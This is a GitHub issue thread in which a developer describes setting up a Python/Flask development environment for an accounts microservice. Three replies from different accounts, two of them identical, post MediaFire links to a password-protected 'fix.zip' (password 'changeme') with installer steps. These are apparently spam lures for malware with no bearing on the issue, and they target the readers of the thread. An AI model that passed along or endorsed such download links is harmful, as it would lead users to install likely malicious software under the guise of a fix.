### ISSUE TITLE
Set up the development environment

### ISSUE THREAD

**Issue by skpatil99** [skpatil99/devops-capstone-project#3]

**Comment by skpatil99** [comment]
As a developer
I need to set up the development environment for the accounts microservice
So that I can start building and testing the service in a consistent and isolated environment

Details and Assumptions
The environment will include necessary dependencies like Python, Flask, and a database connection.
All developers on the team should use the same setup to avoid environment-related issues.
Acceptance Criteria
gherkin
Copy code
Given a new development machine
When the setup script is run
Then the environment is prepared with all necessary tools and dependencies

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
